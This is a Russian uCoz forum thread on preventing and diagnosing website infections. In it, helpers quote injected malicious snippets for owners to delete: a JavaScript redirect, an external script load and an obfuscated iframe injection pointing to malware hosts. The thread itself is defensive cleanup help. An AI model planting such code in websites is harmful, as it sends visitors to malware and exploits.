Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1711 | 20:05:25 30 Янв 2015
    Batyanya, из блока поиск удалить скрипт

    Код
    <script language = 'javascript'>
      var delay = 0;
      setTimeout("document.location.href='http://muskle.tk/3.html'", delay);
    </script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1712 | 07:00:19 31 Янв 2015
    Цитата webanet ()
    Batyanya, из блока поиск удалить скрипт<script language = 'javascript'>
    var delay = 0;
    setTimeout("document.location.href='http://muskle.tk/3.html'", delay);
    </script>

    Не могу найти этот скрипт:
    http://prntscr.com/5z7eib
    http://prntscr.com/5z7ep1
    http://prntscr.com/5z7ewf
    _VITALIK_
    Сообщений: 696
    Репутация: 115
    Уровень замечаний:

    Сообщение # 1713 | 07:56:37 31 Янв 2015
    Цитата Batyanya ()
    Не могу найти этот скрипт:

    Batyanya, Ну если я правильно понял webanet , то этот код находиться в шаблоне контейнера. А может и нет tongue smile
    Сообщение отредактировал _VITALIK_ - Суббота, 31 Янв 2015, 07:59:56
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1714 | 09:20:46 31 Янв 2015
    так где же всё таки искать? можно скриншот?
    _VITALIK_
    Сообщений: 696
    Репутация: 115
    Уровень замечаний:

    Сообщение # 1715 | 14:27:30 31 Янв 2015
    Цитата Batyanya ()
    так где же всё таки искать? можно скриншот?

    Batyanya, Главная » Управление дизайном

    шаблон контейнера



    Прикрепления: 4171699.jpg (162.9 Kb) · 3419455.jpg (135.2 Kb)
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1716 | 17:08:39 31 Янв 2015
    Большое всем спасибо!!! ПОЛУЧИЛОСЬ!
    Но сейчас на главной 3 рекламных блока как их найти и убрать скрипты?
    http://prntscr.com/5zbler
    Заранее спасибо.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1717 | 18:25:53 31 Янв 2015
    Batyanya, из блока форма входа удалить скрипт

    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://kocha.co/jxPnq'></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1718 | 18:59:30 31 Янв 2015
    Цитата webanet ()
    Batyanya, из блока форма входа удалить скрипт<script language='javascript' charset='UTF-8' type='text/javascript' src='http://kocha.co/jxPnq'></script>
    webanet, этого скрипта нет в форме входа
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1719 | 19:05:36 31 Янв 2015
    Batyanya, читаем по слогам три раза, а потом ещё четыре

    из блока форма входа удалить скрипт. это не в форме входа. это в блоке формы входа. те же самые действия как и с удалением предыдущего скрипта. открываем шаблоны глобальных блоков и ищем указанный скрипт
    очень советую проверить компьютер на вирусы
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1720 | 13:20:30 02 Фев 2015
    Цитата webanet ()
    это не в форме входа. это в блоке формы вход
    Цитата webanet ()
    Batyanya, читаем по слогам три раза, а потом ещё четыреиз блока форма входа удалить скрипт. это не в форме входа. это в блоке формы входа. те же самые действия как и с удалением предыдущего скрипта. открываем шаблоны глобальных блоков и ищем указанный скрипт

    Со своими проблемами (свалившимися вообще по жизни за последнее время ) я вообще отупел, где этот блок формы входа.
    http://prntscr.com/6036tv
    webanet,
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1721 | 14:30:05 02 Фев 2015
    Batyanya, Панель управления вашим сайтом » Управление дизайном » Первый контейнер
    Batyanya
    Сообщений: 35
    Репутация: 3
    Уровень замечаний:

    Сообщение # 1722 | 15:27:17 02 Фев 2015
    Цитата webanet ()
    это не в форме входа. это в блоке формы вход
    webanet, $Vladimir$

    СПАСИБО!
    Leonora_
    Сообщений: 130
    Репутация: 6

    Сообщение # 1723 | 12:29:42 15 Фев 2015
    Здравствуйте. Очень нуждаюсь в помощи. Еще вчера все было нормально. Сегодня зашла на сайт http://trudolub-sad.ucoz.ua/ (пишет ОПАСНЫЙ САЙТ). Проверила на антивирус тут http://antivirus-alarm.ru/proverka/?url=trudolub-sad.ucoz.ua/&again=1


    вроде все нормально.

    А на Яндексе пишет "На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код."



    Как убрать эти вставки? Ничего не понимаю в этом. Помогите пожалуйста.
    Прикрепления: 5409138.jpg (77.4 Kb) · 9035902.jpg (175.6 Kb)
    _VITALIK_
    Сообщений: 696
    Репутация: 115
    Уровень замечаний:

    Сообщение # 1724 | 13:10:01 15 Фев 2015
    Leonora_, Ну попробуйте слайдер удалить
    Цитата
    <!-- Cлайдер CU3ER -->
    <div align="center"><iframe frameborder="0" height="420" marginheight="0" marginwidth="0" scrolling="no" src="http://trudolub-sad.ucoz.ua/slider/slider.html" width="560"></iframe></div>
    <!-- /Cлайдер CU3ER -->
    Сообщение отредактировал _VITALIK_ - Воскресенье, 15 Фев 2015, 13:21:07
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1725 | 13:26:50 15 Фев 2015
    Leonora_, http://yandex.ru/infected?url=trudolub-sad.ucoz.ua
    Цитата
    Сайт trudolub-sad.ucoz.ua может представлять угрозу
    Что произошло
    Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации.

    В настройках вашей сети запрещён показ страниц с подобных ресурсов.

    Подробнее про вредоносный код

    Яндекс периодически проверяет сайты, чтобы предупреждать пользователей об опасных страницах. Последняя проверка (менее двух дней назад) показала, что на сайте размещён вредоносный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.

    Вредоносный код:

    обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;
    содержит exploit (по данным поведенческого анализатора Яндекса);
    содержит Mal/Iframe-AN (по данным компании Sophos).


    Удалите код ведущий на lifi-gta .ru и обратитесь в Яндекс через Яндекс.Вебмастер

    Зарегистрируйте сайт на этом сервисе, чтобы получать оповещения о заражении и детальную информацию об опасных страницах. Вы сможете также перепроверить сайт после удаления вредоносного кода.
    Подозрительный код. Сценарий содержит IFRAME.
    Код
    var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://lifi-gta.ru'; wishyhd.appendChild(emptiestag);


    P.S. удалите по возможности и другие коды ведущие на сторонние ресурсы

    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: